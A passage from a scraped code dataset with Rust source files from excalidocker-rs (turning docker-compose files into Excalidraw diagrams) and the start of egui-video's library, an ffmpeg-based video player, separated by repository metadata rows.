// here, based on `traversal_order` we need to find first and last for each network
let mut result = vec![];
for network in networks {
let containers_within_network: Vec<String> = traversal_order
.iter()
.filter(|name| {
is_in_network(
&container_name_to_container_struct.clone(),
name.to_string(),
network.clone(),
)
})
.cloned()
.collect();
result.push((
network,
containers_within_network.first().unwrap().to_string(),
containers_within_network.last().unwrap().to_string(),
))
}
result
}
},
None => vec![],
}
}
/// Returns `True` if a container with the `container_name` name
/// belongs to the `network_name` network.
/// Otherwise `False`
fn is_in_network(
container_name_to_container_struct: &HashMap<&str, DockerContainer>,
container_name: String,
network_name: String,
) -> bool {
container_name_to_container_struct
.get(container_name.as_str())
.unwrap()
.clone()
.networks
.unwrap()
.contains(&network_name)
}
/// According to current `exc.app_state.grid_size` setting and text/font size
/// it's possible to accommodate approximately 3 letters in one grid item.
/// The container width is 7 grid items(140) in total and uses only 5 grid items
/// to accommodate the text up to 14 characters(`max_container_name_len`)
/// Empirically found that for
/// 20 | 1.5 letters in grid
/// 28 | 1 letter in grid
/// 36 | 1 letter in grid
fn find_additional_width(container_name: &str, scale: &i32, font_size: &i32) -> i32 {
let container_name_len = container_name.len();
let (container_name_len_max, elements_per_item_grid) = match *font_size {
FONT_SIZE_SMALL => (14, 3),
FONT_SIZE_MEDIUM => (9, 2),
FONT_SIZE_LARGE => (5, 1),
FONT_SIZE_EXTRA_LARGE => (2, 1),
_ => (1, 1),
};
let text_accommodation_len_default = 5;
let text_accommodation_margin = 3;
if container_name_len > container_name_len_max {
let required_space_for_text = ((container_name_len / elements_per_item_grid)
- text_accommodation_len_default
+ text_accommodation_margin) as i32;
scale * required_space_for_text
} else {
0
}
}
#[derive(Debug, Serialize, Deserialize, Clone)]
struct DockerContainer {
pub id: String,
image: String,
command: Option<String>,
environment: Option<HashMap<String, String>>,
depends_on: Option<Vec<String>>,
ports: Option<Vec<String>>, // HOST:CONTAINER
volumes: Option<Vec<String>>,
networks: Option<Vec<String>>, // TODO consider Set
// TODO: add other fields
}
impl DockerContainer {
fn new(id: String) -> Self {
Self {
id,
image: String::new(),
command: None,
environment: None,
ports: None,
volumes: None,
depends_on: None,
networks: None,
}
}
fn parse_depends_on(value: &Value) -> Option<Vec<String>> {
match value {
Value::Sequence(depends_on) => {
let depends_on_vec: Vec<String> = depends_on
.iter()
.filter_map(|item| item.as_str().map(|s| s.to_string()))
.collect();
Some(depends_on_vec)
}
Value::Mapping(depends_on) => {
let depends_on_vec: Vec<String> = depends_on
.keys()
.filter_map(|key| key.as_str().map(|s| s.to_string()))
.collect();
Some(depends_on_vec)
}
_ => None,
}
}
fn parse_networks(value: &Value) -> Option<Vec<String>> {
match value {
Value::Sequence(networks) => {
let networks_strings: Vec<String> = networks
.iter()
.filter_map(|network| network.as_str().map(|nw| nw.to_string()))
.collect();
Some(networks_strings)
}
Value::Mapping(networks) => {
let networks_vec: Vec<String> = networks
.keys()
.filter_map(|key| key.as_str().map(|s| s.to_string()))
.collect();
Some(networks_vec)
}
_ => None,
}
}
fn convert_to_container(id: String, value: &Value) -> Self {
let mapping = value.as_mapping().unwrap();
let mut container = DockerContainer::new(id);
for (key, value) in mapping {
match key.as_str().unwrap() {
"image" => {
if let Value::String(image) = value {
container.image = image.clone();
}
}
"command" => {
if let Value::String(command) = value {
container.command = Some(command.clone());
}
}
"environment" => {
if let Value::Mapping(environment) = value {
let mut env_map = HashMap::new();
for (env_key, env_value) in environment {
if let (Value::String(key), Value::String(value)) = (env_key, env_value)
{
env_map.insert(key.clone(), value.clone());
}
}
container.environment = Some(env_map);
}
}
"ports" => {
if let Value::Sequence(ports) = value {
let port_strings = ports
.iter()
.filter_map(|port| port.as_str().map(|p| p.to_string()))
.collect();
container.ports = Some(port_strings);
}
}
"volumes" => {
if let Value::Sequence(volumes) = value {
let volume_strings = volumes
.iter()
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | true |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/exporters/excalidraw_config.rs | src/exporters/excalidraw_config.rs | use crate::{
color_utils::COLOR_TO_HEX,
exporters::excalidraw_config::consts::{
NO_X_ALIGNMENT_FACTOR, NO_X_MARGIN, NO_Y_ALIGNMENT_FACTOR, NO_Y_MARGIN, X_ALIGNMENT_FACTOR,
X_MARGIN, Y_ALIGNMENT_FACTOR, Y_MARGIN,
},
};
use serde::{Deserialize, Serialize, Serializer};
pub const DEFAULT_CONFIG_PATH: &str = "excalidocker-config.yaml";
pub const DEFAULT_CONFIG: &str = r###"
font:
size: 16
family: 1
services:
background_color: "#b2f2bb"
fill: "hachure"
edge: "round"
ports:
background_color: "#a5d8ff"
fill: "hachure"
connections:
visible: true
edge: "sharp"
alignment:
mode: "stepped"
network:
visible: true
"###;
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct ExcalidrawConfig {
pub font: Font,
pub services: Services,
pub ports: Ports,
pub connections: Connections,
pub alignment: Alignment,
pub network: Network,
}
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct Font {
pub size: i32,
pub family: i32,
}
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct Services {
#[serde(serialize_with = "serialize_background_color")]
pub background_color: String,
pub fill: String,
pub edge: String,
}
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct Ports {
#[serde(serialize_with = "serialize_background_color")]
pub background_color: String,
pub fill: String,
}
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct Connections {
pub visible: bool,
pub edge: String,
}
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct Network {
pub visible: bool,
}
#[derive(Debug, Serialize, Deserialize, Clone)]
pub struct Alignment {
pub mode: String,
}
#[derive(Debug, Clone, Serialize)]
#[serde(rename_all = "camelCase")]
pub struct BoundElement {
pub id: String,
#[serde(rename = "type")]
pub element_type: String,
}
#[derive(Debug, Serialize)]
#[serde(rename_all = "camelCase")]
pub struct Binding {
pub element_id: String,
pub focus: f32,
pub gap: u16,
}
#[derive(Debug, Clone, Serialize)]
#[serde(rename_all = "camelCase")]
pub struct Roundness {
#[serde(rename = "type")]
pub roundness_type: i32,
}
pub fn binding(element_id: String) -> Binding {
Binding {
element_id,
focus: 0.05,
gap: 1,
}
}
pub fn arrow_bounded_element(id: String) -> BoundElement {
BoundElement {
id,
element_type: "arrow".to_string(),
}
}
pub fn roundness(edge: String) -> Option<Roundness> {
match edge.as_str() {
"round" => Some(Roundness { roundness_type: 3 }),
_ => None,
}
}
fn serialize_background_color<S: Serializer>(input: &String, s: S) -> Result<S::Ok, S::Error> {
if input.starts_with('#') {
input.serialize(s)
} else {
COLOR_TO_HEX
.get(input)
.unwrap_or(&crate::elements::STROKE_COLOR)
.serialize(s)
}
}
pub mod consts {
pub const NO_X_MARGIN: i32 = 0;
pub const NO_Y_MARGIN: i32 = 0;
pub const X_MARGIN: i32 = 60;
pub const Y_MARGIN: i32 = 60;
pub const X_ALIGNMENT_FACTOR: i32 = 1;
pub const NO_X_ALIGNMENT_FACTOR: i32 = 0;
pub const Y_ALIGNMENT_FACTOR: i32 = 1;
pub const NO_Y_ALIGNMENT_FACTOR: i32 = 0;
pub const NON_LOCKED: bool = false;
}
/// Based on the previous implementation it was observed
/// for 'horizontal' and 'stepped' alignment
/// x += x_margin + container_width;
/// y += y_margin;
///
/// and for 'vertical' alignment
/// x += x_margin;
/// y += y_margin + scale;
pub fn margins(alignment_mode: &str) -> (i32, i32, i32, i32) {
match alignment_mode {
"horizontal" => (
X_MARGIN,
NO_Y_MARGIN,
X_ALIGNMENT_FACTOR,
NO_Y_ALIGNMENT_FACTOR,
),
"vertical" => (
NO_X_MARGIN,
Y_MARGIN,
NO_X_ALIGNMENT_FACTOR,
Y_ALIGNMENT_FACTOR,
),
_ => (
X_MARGIN,
Y_MARGIN,
X_ALIGNMENT_FACTOR,
NO_Y_ALIGNMENT_FACTOR,
), // "stepped" is default
}
}
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | false |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/exporters/excalidraw.rs | src/exporters/excalidraw.rs | use serde::Serialize;
use serde_json::{Map, Value};
use super::excalidraw_config::{consts::NON_LOCKED, BoundElement, Roundness};
use crate::exporters::excalidraw_config::{roundness, Binding};
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct ExcalidrawFile {
pub r#type: String,
pub version: i32,
pub source: Option<String>,
pub elements: Vec<Element>,
pub app_state: AppState,
pub files: Map<String, Value>,
}
impl Default for ExcalidrawFile {
fn default() -> Self {
Self {
r#type: "excalidraw".into(),
version: 2,
source: None,
elements: Vec::with_capacity(0),
app_state: Default::default(),
files: Map::with_capacity(0),
}
}
}
#[derive(Serialize)]
#[serde(rename_all = "camelCase", tag = "type")]
pub enum Element {
#[serde(rename_all = "camelCase")]
Text {
x: i32,
y: i32,
width: i32,
height: i32,
group_ids: Vec<String>,
angle: i32,
stroke_color: String,
background_color: String,
fill_style: String,
stroke_width: i32,
stroke_style: String,
roughness: i32,
opacity: i32,
stroke_sharpness: String,
locked: bool,
text: String,
font_size: i32,
font_family: i32,
text_align: String,
vertical_align: String,
baseline: i32,
},
#[serde(rename_all = "camelCase")]
Arrow {
id: String,
x: i32,
y: i32,
width: i32,
height: i32,
angle: i32,
stroke_color: String,
background_color: String,
fill_style: String,
stroke_width: i32,
stroke_style: String,
roundness: Option<Roundness>,
roughness: i32,
opacity: i32,
start_binding: Binding,
end_binding: Binding,
stroke_sharpness: String,
locked: bool,
points: Vec<[i32; 2]>,
},
#[serde(rename_all = "camelCase")]
Rectangle {
id: String,
x: i32,
y: i32,
width: i32,
height: i32,
group_ids: Vec<String>,
bound_elements: Vec<BoundElement>,
angle: i32,
stroke_color: String,
background_color: String,
fill_style: String,
stroke_width: i32,
stroke_style: String,
roughness: i32,
roundness: Option<Roundness>,
opacity: i32,
stroke_sharpness: String,
locked: bool,
},
#[serde(rename_all = "camelCase")]
Ellipse {
id: String,
x: i32,
y: i32,
width: i32,
height: i32,
group_ids: Vec<String>,
bound_elements: Vec<BoundElement>,
angle: i32,
stroke_color: String,
background_color: String,
fill_style: String,
stroke_width: i32,
stroke_style: String,
roughness: i32,
opacity: i32,
stroke_sharpness: String,
locked: bool,
},
}
pub mod elements {
pub const ANGLE: i32 = 0;
pub const STROKE_COLOR: &str = "#000000";
pub const NETWORK_COLOR: &str = "#f2f0e6";
pub const BACKGROUND_COLOR: &str = "transparent";
pub const FILL_STYLE: &str = "hachure";
pub const STROKE_WIDTH: i32 = 1;
pub const STROKE_STYLE: &str = "solid";
pub const CONNECTION_STYLE: &str = "dashed";
pub const OPACITY: i32 = 100;
pub const STROKE_SHARPNESS: &str = "sharp";
pub const FONT_SIZE_SMALL: i32 = 16;
pub const FONT_SIZE_MEDIUM: i32 = 20;
pub const FONT_SIZE_LARGE: i32 = 28;
pub const FONT_SIZE_EXTRA_LARGE: i32 = 36;
pub const TEXT_ALIGN_LEFT: &str = "left";
pub const VERTICAL_ALIGN_TOP: &str = "top";
}
#[allow(clippy::too_many_arguments)]
impl Element {
pub fn text(
x: i32,
y: i32,
width: i32,
height: i32,
group_ids: Vec<String>,
angle: i32,
stroke_color: String,
background_color: String,
fill_style: String,
stroke_width: i32,
stroke_style: String,
opacity: i32,
stroke_sharpness: String,
text: String,
font_size: i32,
font_family: i32,
text_align: String,
vertical_align: String,
) -> Self {
Self::Text {
x,
y,
width,
height,
group_ids,
angle,
stroke_color,
background_color,
fill_style,
stroke_width,
stroke_style,
roughness: 0,
opacity,
stroke_sharpness,
locked: NON_LOCKED,
text,
font_size,
font_family,
text_align,
vertical_align,
baseline: 15,
}
}
pub fn arrow(
id: String,
x: i32,
y: i32,
width: i32,
height: i32,
start_binding: Binding,
end_binding: Binding,
angle: i32,
stroke_color: String,
background_color: String,
fill_style: String,
stroke_width: i32,
stroke_style: String,
roundness: Option<Roundness>,
opacity: i32,
stroke_sharpness: String,
points: Vec<[i32; 2]>,
) -> Self {
Self::Arrow {
id,
x,
y,
width,
height,
start_binding,
end_binding,
angle,
stroke_color,
background_color,
fill_style,
stroke_width,
stroke_style,
roundness,
roughness: 2, // roughness: 0
opacity,
stroke_sharpness,
locked: NON_LOCKED,
points,
}
}
pub fn rectangle(
id: String,
x: i32,
y: i32,
width: i32,
height: i32,
group_ids: Vec<String>,
bound_elements: Vec<BoundElement>,
angle: i32,
stroke_color: String,
background_color: String,
fill_style: String,
stroke_width: i32,
stroke_style: String,
roundness: Option<Roundness>,
opacity: i32,
stroke_sharpness: String,
) -> Self {
Self::Rectangle {
id,
x,
y,
width,
height,
group_ids,
bound_elements,
angle,
stroke_color,
background_color,
fill_style,
stroke_width,
stroke_style,
roughness: 2, // roughness: 0, - strict
roundness,
opacity,
stroke_sharpness,
locked: NON_LOCKED,
}
}
pub fn ellipse(
id: String,
x: i32,
y: i32,
width: i32,
height: i32,
group_ids: Vec<String>,
bound_elements: Vec<BoundElement>,
angle: i32,
stroke_color: String,
background_color: String,
fill_style: String,
stroke_width: i32,
stroke_style: String,
opacity: i32,
stroke_sharpness: String,
) -> Self {
Self::Ellipse {
id,
x,
y,
width,
height,
group_ids,
bound_elements,
angle,
stroke_color,
background_color,
fill_style,
stroke_width,
stroke_style,
roughness: 1, // roughness: 0
opacity,
stroke_sharpness,
locked: NON_LOCKED,
}
}
pub fn draw_ellipse(
id: String,
x: i32,
y: i32,
width: i32,
height: i32,
group_ids: Vec<String>,
bound_elements: Vec<BoundElement>,
background_color: String,
fill_style: String,
) -> Self {
Self::ellipse(
id,
x,
y,
width,
height,
group_ids,
bound_elements,
elements::ANGLE,
elements::STROKE_COLOR.into(),
background_color, //elements::BACKGROUND_COLOR.into(),
fill_style, //elements::FILL_STYLE.into(),
elements::STROKE_WIDTH,
elements::STROKE_STYLE.into(),
elements::OPACITY,
elements::STROKE_SHARPNESS.into(),
)
}
pub fn draw_small_monospaced_text(
text: String,
x: i32,
y: i32,
group_ids: Vec<String>,
font_size: i32,
font_family: i32,
) -> Self {
Self::text(
x,
y,
(4 + text.chars().count() * 18) as i32,
(text.lines().count() * 19) as i32,
group_ids,
0,
elements::STROKE_COLOR.into(),
elements::BACKGROUND_COLOR.into(),
elements::FILL_STYLE.into(),
elements::STROKE_WIDTH,
elements::STROKE_STYLE.into(),
elements::OPACITY,
elements::STROKE_SHARPNESS.into(),
text,
font_size, //elements::FONT_SIZE_SMALL,
font_family, //elements::FONT_FAMILY_MONOSPACE,
elements::TEXT_ALIGN_LEFT.into(),
elements::VERTICAL_ALIGN_TOP.into(),
)
}
pub fn simple_arrow(
id: String,
x: i32,
y: i32,
width: i32,
height: i32,
stroke_style: String,
edge: String,
points: Vec<[i32; 2]>,
start_binding: Binding,
end_binding: Binding,
) -> Self {
Self::arrow(
id,
x,
y,
width, // TODO
height,
start_binding,
end_binding,
elements::ANGLE,
elements::STROKE_COLOR.into(),
elements::BACKGROUND_COLOR.into(),
elements::FILL_STYLE.into(),
elements::STROKE_WIDTH,
stroke_style,
roundness(edge),
elements::OPACITY,
elements::STROKE_SHARPNESS.into(),
points,
)
}
pub fn simple_rectangle(
id: String,
x: i32,
y: i32,
width: i32,
height: i32,
group_ids: Vec<String>,
bound_elements: Vec<BoundElement>,
background_color: String,
fill_style: String,
stroke_style: String,
edge: String,
) -> Self {
Self::rectangle(
id,
x,
y,
width,
height,
group_ids,
bound_elements,
elements::ANGLE,
elements::STROKE_COLOR.into(),
background_color, //elements::BACKGROUND_COLOR.into(),
fill_style, //elements::FILL_STYLE.into(),
elements::STROKE_WIDTH,
stroke_style,
roundness(edge),
elements::OPACITY,
elements::STROKE_SHARPNESS.into(),
)
}
}
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct AppState {
pub grid_size: i32,
pub view_background_color: String,
}
impl Default for AppState {
fn default() -> Self {
Self {
grid_size: 20,
view_background_color: "#ffffff".into(),
}
}
}
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | false |
etolbakov/excalidocker-rs | https://github.com/etolbakov/excalidocker-rs/blob/1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef/src/exporters/mod.rs | src/exporters/mod.rs | pub mod excalidraw;
pub mod excalidraw_config;
| rust | MIT | 1516e3e3bb3edabbfa79b7bacde5488b2dc0a0ef | 2026-01-04T20:25:32.074311Z | false |
n00kii/egui-video | https://github.com/n00kii/egui-video/blob/68933f42b45220af92221fb82315b03c87e7efce/src/lib.rs | src/lib.rs | #![warn(missing_docs)]
#![allow(rustdoc::bare_urls)]
#![doc = include_str!("../README.md")]
//! # Simple video player example
//! ```
#![doc = include_str!("../examples/main.rs")]
//! ```
extern crate ffmpeg_the_third as ffmpeg;
use anyhow::Result;
use atomic::Atomic;
use bytemuck::NoUninit;
use chrono::{DateTime, Duration, Utc};
use egui::emath::RectTransform;
use egui::epaint::Shadow;
use egui::load::SizedTexture;
use egui::{
vec2, Align2, Color32, ColorImage, FontId, Image, Pos2, Rect, Response, Rounding, Sense,
Spinner, TextureHandle, TextureOptions, Ui, Vec2,
};
use ffmpeg::error::EAGAIN;
use ffmpeg::ffi::{AVERROR, AV_TIME_BASE};
use ffmpeg::format::context::input::Input;
use ffmpeg::format::{input, Pixel};
use ffmpeg::frame::Audio;
use ffmpeg::media::Type;
use ffmpeg::software::scaling::{context::Context, flag::Flags};
use ffmpeg::util::frame::video::Video;
use ffmpeg::{rescale, Packet, Rational, Rescale};
use ffmpeg::{software, ChannelLayout};
use parking_lot::Mutex;
use ringbuf::traits::{Consumer, Observer, Producer, Split};
use ringbuf::wrap::caching::Caching;
use ringbuf::HeapRb;
use sdl2::audio::{self, AudioCallback, AudioFormat, AudioSpecDesired};
use std::collections::VecDeque;
use std::ops::Deref;
use std::sync::{Arc, Weak};
use std::time::UNIX_EPOCH;
use subtitle::Subtitle;
use timer::{Guard, Timer};
mod subtitle;
#[cfg(feature = "from_bytes")]
use tempfile::NamedTempFile;
#[cfg(feature = "from_bytes")]
use std::io::Write;
fn format_duration(dur: Duration) -> String {
let dt = DateTime::<Utc>::from(UNIX_EPOCH) + dur;
if dt.format("%H").to_string().parse::<i64>().unwrap() > 0 {
dt.format("%H:%M:%S").to_string()
} else {
dt.format("%M:%S").to_string()
}
}
/// The playback device. Needs to be initialized (and kept alive!) for use by a [`Player`].
pub struct AudioDevice(pub(crate) audio::AudioDevice<AudioDeviceCallback>);
impl AudioDevice {
/// Create a new [`AudioDevice`] from an existing [`sdl2::AudioSubsystem`]. An [`AudioDevice`] is required for using audio.
pub fn from_subsystem(audio_sys: &sdl2::AudioSubsystem) -> Result<AudioDevice, String> {
let audio_spec = AudioSpecDesired {
freq: Some(44_100),
channels: Some(2),
samples: None,
};
let device = audio_sys.open_playback(None, &audio_spec, |_spec| AudioDeviceCallback {
sample_streams: vec![],
})?;
Ok(AudioDevice(device))
}
/// Create a new [`AudioDevice`]. Creates an [`sdl2::AudioSubsystem`]. An [`AudioDevice`] is required for using audio.
pub fn new() -> Result<AudioDevice, String> {
// without setting this hint, SDL captures SIGINT (Ctrl+C) and because we are not handling SDL events
// this prevents the application from closing
sdl2::hint::set("SDL_NO_SIGNAL_HANDLERS", "1");
Self::from_subsystem(&sdl2::init()?.audio()?)
}
}
enum PlayerMessage {
StreamCycled(Type),
}
type PlayerMessageSender = std::sync::mpsc::Sender<PlayerMessage>;
type PlayerMessageReciever = std::sync::mpsc::Receiver<PlayerMessage>;
type ApplyVideoFrameFn = Box<dyn FnMut(ColorImage) + Send>;
type SubtitleQueue = Arc<Mutex<VecDeque<Subtitle>>>;
type RingbufProducer<T> = Caching<Arc<HeapRb<T>>, true, false>;
type RingbufConsumer<T> = Caching<Arc<HeapRb<T>>, false, true>;
type AudioSampleProducer = RingbufProducer<f32>;
type AudioSampleConsumer = RingbufConsumer<f32>;
/// Configurable aspects of a [`Player`].
#[derive(Clone, Debug)]
pub struct PlayerOptions {
/// Should the stream loop if it finishes?
pub looping: bool,
/// The volume of the audio stream.
pub audio_volume: Shared<f32>,
/// The maximum volume of the audio stream.
pub max_audio_volume: f32,
/// The texture options for the displayed video frame.
pub texture_options: TextureOptions,
}
impl Default for PlayerOptions {
fn default() -> Self {
Self {
looping: true,
max_audio_volume: 1.,
audio_volume: Shared::new(0.5),
texture_options: TextureOptions::default(),
}
}
}
impl PlayerOptions {
/// Set the maxmimum player volume, and scale the actual player volume to the
/// same current ratio.
pub fn set_max_audio_volume(&mut self, volume: f32) {
self.audio_volume
.set(self.audio_volume.get() * (volume / self.max_audio_volume));
self.max_audio_volume = volume;
}
/// Set the player volume, clamped in `0.0..=max_audio_volume`.
pub fn set_audio_volume(&mut self, volume: f32) {
self.audio_volume
.set(volume.clamp(0., self.max_audio_volume));
}
}
/// The [`Player`] processes and controls streams of video/audio. This is what you use to show a video file.
/// Initialize once, and use the [`Player::ui`] or [`Player::ui_at()`] functions to show the playback.
pub struct Player {
/// The video streamer of the player.
pub video_streamer: Arc<Mutex<VideoStreamer>>,
/// The audio streamer of the player. Won't exist unless [`Player::with_audio`] is called and there exists
/// a valid audio stream in the file.
pub audio_streamer: Option<Arc<Mutex<AudioStreamer>>>,
/// The subtitle streamer of the player. Won't exist unless [`Player::with_subtitles`] is called and there exists
/// a valid subtitle stream in the file.
pub subtitle_streamer: Option<Arc<Mutex<SubtitleStreamer>>>,
/// The state of the player.
pub player_state: Shared<PlayerState>,
/// The player's texture handle.
pub texture_handle: TextureHandle,
/// The size of the video stream.
pub size: Vec2,
/// The total duration of the stream, in milliseconds.
pub duration_ms: i64,
/// The framerate of the video stream, in frames per second.
pub framerate: f64,
/// Configures certain aspects of this [`Player`].
pub options: PlayerOptions,
audio_stream_info: StreamInfo,
subtitle_stream_info: StreamInfo,
message_sender: PlayerMessageSender,
message_reciever: PlayerMessageReciever,
video_timer: Timer,
audio_timer: Timer,
subtitle_timer: Timer,
audio_thread: Option<Guard>,
video_thread: Option<Guard>,
subtitle_thread: Option<Guard>,
ctx_ref: egui::Context,
last_seek_ms: Option<i64>,
preseek_player_state: Option<PlayerState>,
#[cfg(feature = "from_bytes")]
temp_file: Option<NamedTempFile>,
video_elapsed_ms: Shared<i64>,
audio_elapsed_ms: Shared<i64>,
subtitle_elapsed_ms: Shared<i64>,
video_elapsed_ms_override: Option<i64>,
subtitles_queue: SubtitleQueue,
current_subtitles: Vec<Subtitle>,
input_path: String,
}
/// The possible states of a [`Player`].
#[derive(PartialEq, Clone, Copy, Debug, NoUninit)]
#[repr(u8)]
pub enum PlayerState {
/// No playback.
Stopped,
/// Streams have reached the end of the file.
EndOfFile,
/// Stream is seeking.
SeekingInProgress,
/// Stream has finished seeking.
SeekingFinished,
/// Playback is paused.
Paused,
/// Playback is ongoing.
Playing,
/// Playback is scheduled to restart.
Restarting,
}
/// Streams video.
pub struct VideoStreamer {
video_decoder: ffmpeg::decoder::Video,
video_stream_index: StreamIndex,
player_state: Shared<PlayerState>,
duration_ms: i64,
input_context: Input,
video_elapsed_ms: Shared<i64>,
_audio_elapsed_ms: Shared<i64>,
apply_video_frame_fn: Option<ApplyVideoFrameFn>,
}
/// Streams audio.
pub struct AudioStreamer {
video_elapsed_ms: Shared<i64>,
audio_elapsed_ms: Shared<i64>,
duration_ms: i64,
audio_decoder: ffmpeg::decoder::Audio,
resampler: software::resampling::Context,
audio_sample_producer: AudioSampleProducer,
input_context: Input,
player_state: Shared<PlayerState>,
audio_stream_indices: VecDeque<StreamIndex>,
}
/// Streams subtitles.
pub struct SubtitleStreamer {
video_elapsed_ms: Shared<i64>,
_audio_elapsed_ms: Shared<i64>,
subtitle_elapsed_ms: Shared<i64>,
duration_ms: i64,
subtitle_decoder: ffmpeg::decoder::Subtitle,
next_packet: Option<Packet>,
subtitles_queue: SubtitleQueue,
input_context: Input,
player_state: Shared<PlayerState>,
subtitle_stream_indices: VecDeque<StreamIndex>,
}
#[derive(Clone, Debug)]
/// Simple concurrecy of primitive values.
pub struct Shared<T: Copy + bytemuck::NoUninit> {
raw_value: Arc<Atomic<T>>,
}
impl<T: Copy + bytemuck::NoUninit> Shared<T> {
/// Set the value.
pub fn set(&self, value: T) {
self.raw_value.store(value, atomic::Ordering::Relaxed)
}
/// Get the value.
pub fn get(&self) -> T {
self.raw_value.load(atomic::Ordering::Relaxed)
}
/// Make a new cache.
pub fn new(value: T) -> Self {
Self {
raw_value: Arc::new(Atomic::new(value)),
}
}
}
const AV_TIME_BASE_RATIONAL: Rational = Rational(1, AV_TIME_BASE);
const MILLISEC_TIME_BASE: Rational = Rational(1, 1000);
fn timestamp_to_millisec(timestamp: i64, time_base: Rational) -> i64 {
timestamp.rescale(time_base, MILLISEC_TIME_BASE)
}
fn millisec_to_timestamp(millisec: i64, time_base: Rational) -> i64 {
millisec.rescale(MILLISEC_TIME_BASE, time_base)
}
#[inline(always)]
fn millisec_approx_eq(a: i64, b: i64) -> bool {
a.abs_diff(b) < 50
}
impl Player {
/// A formatted string for displaying the duration of the video stream.
pub fn duration_text(&mut self) -> String {
format!(
"{} / {}",
format_duration(Duration::milliseconds(self.elapsed_ms())),
format_duration(Duration::milliseconds(self.duration_ms))
)
}
fn reset(&mut self) {
self.last_seek_ms = None;
self.video_elapsed_ms_override = None;
self.video_elapsed_ms.set(0);
self.audio_elapsed_ms.set(0);
self.video_streamer.lock().reset();
if let Some(audio_decoder) = self.audio_streamer.as_mut() {
audio_decoder.lock().reset();
}
}
/// The elapsed duration of the stream, in milliseconds. This value will won't be truly accurate to the decoders
/// while seeking, and will instead be overridden with the target seek location (for visual representation purposes).
pub fn elapsed_ms(&self) -> i64 {
self.video_elapsed_ms_override
.as_ref()
.map(|i| *i)
.unwrap_or(self.video_elapsed_ms.get())
}
fn set_state(&mut self, new_state: PlayerState) {
self.player_state.set(new_state)
}
/// Pause the stream.
pub fn pause(&mut self) {
self.set_state(PlayerState::Paused)
}
/// Resume the stream from a paused state.
pub fn resume(&mut self) {
self.set_state(PlayerState::Playing)
}
/// Stop the stream.
pub fn stop(&mut self) {
self.set_state(PlayerState::Stopped);
self.video_thread = None;
self.audio_thread = None;
self.reset()
}
fn duration_frac(&mut self) -> f32 {
self.elapsed_ms() as f32 / self.duration_ms as f32
}
/// Seek to a location in the stream.
pub fn seek(&mut self, seek_frac: f32) {
let current_state = self.player_state.get();
if !matches!(current_state, PlayerState::SeekingInProgress) {
match current_state {
PlayerState::Stopped | PlayerState::EndOfFile => {
self.preseek_player_state = Some(PlayerState::Paused);
self.start();
}
PlayerState::Paused | PlayerState::Playing => {
self.preseek_player_state = Some(current_state);
}
_ => (),
}
let video_streamer = self.video_streamer.clone();
let mut audio_streamer = self.audio_streamer.clone();
let mut subtitle_streamer = self.subtitle_streamer.clone();
let subtitle_queue = self.subtitles_queue.clone();
self.last_seek_ms = Some((seek_frac as f64 * self.duration_ms as f64) as i64);
self.set_state(PlayerState::SeekingInProgress);
if let Some(audio_streamer) = audio_streamer.take() {
std::thread::spawn(move || {
audio_streamer.lock().seek(seek_frac);
});
};
if let Some(subtitle_streamer) = subtitle_streamer.take() {
self.current_subtitles.clear();
std::thread::spawn(move || {
subtitle_queue.lock().clear();
subtitle_streamer.lock().seek(seek_frac);
});
};
std::thread::spawn(move || {
video_streamer.lock().seek(seek_frac);
});
}
}
fn spawn_timers(&mut self) {
let mut texture_handle = self.texture_handle.clone();
let texture_options = self.options.texture_options;
let ctx = self.ctx_ref.clone();
let wait_duration = Duration::milliseconds((1000. / self.framerate) as i64);
fn play<T: Streamer>(streamer: &Weak<Mutex<T>>) {
if let Some(streamer) = streamer.upgrade() {
if let Some(mut streamer) = streamer.try_lock() {
if (streamer.player_state().get() == PlayerState::Playing)
&& streamer.primary_elapsed_ms().get() >= streamer.elapsed_ms().get()
{
match streamer.recieve_next_packet_until_frame() {
Ok(frame) => streamer.apply_frame(frame),
Err(e) => {
if is_ffmpeg_eof_error(&e) && streamer.is_primary_streamer() {
streamer.player_state().set(PlayerState::EndOfFile)
}
}
}
}
}
}
}
self.video_streamer.lock().apply_video_frame_fn = Some(Box::new(move |frame| {
texture_handle.set(frame, texture_options)
}));
let video_streamer_ref = Arc::downgrade(&self.video_streamer);
let video_timer_guard = self.video_timer.schedule_repeating(wait_duration, move || {
play(&video_streamer_ref);
ctx.request_repaint();
});
self.video_thread = Some(video_timer_guard);
if let Some(audio_decoder) = self.audio_streamer.as_ref() {
let audio_decoder_ref = Arc::downgrade(audio_decoder);
let audio_timer_guard = self
.audio_timer
.schedule_repeating(Duration::zero(), move || play(&audio_decoder_ref));
self.audio_thread = Some(audio_timer_guard);
}
if let Some(subtitle_decoder) = self.subtitle_streamer.as_ref() {
let subtitle_decoder_ref = Arc::downgrade(subtitle_decoder);
let subtitle_timer_guard = self
.subtitle_timer
.schedule_repeating(wait_duration, move || play(&subtitle_decoder_ref));
self.subtitle_thread = Some(subtitle_timer_guard);
}
}
/// Start the stream.
pub fn start(&mut self) {
self.stop();
self.spawn_timers();
self.resume();
}
/// Process player state updates. This function must be called for proper function
/// of the player. This function is already included in [`Player::ui`] or
/// [`Player::ui_at`].
pub fn process_state(&mut self) {
let mut reset_stream = false;
match self.player_state.get() {
PlayerState::EndOfFile => {
if self.options.looping {
reset_stream = true;
} else {
self.player_state.set(PlayerState::Stopped);
}
}
PlayerState::Playing => {
for subtitle in self.current_subtitles.iter_mut() {
subtitle.remaining_duration_ms -=
self.ctx_ref.input(|i| (i.stable_dt * 1000.) as i64);
}
